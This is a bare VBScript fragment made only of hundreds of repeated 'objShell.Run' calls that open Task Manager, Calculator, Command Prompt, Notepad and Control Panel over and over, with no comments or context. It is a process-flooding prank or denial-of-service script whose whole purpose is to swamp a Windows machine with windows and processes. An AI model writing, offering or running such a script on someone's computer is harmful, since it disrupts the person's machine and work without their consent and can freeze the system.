objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
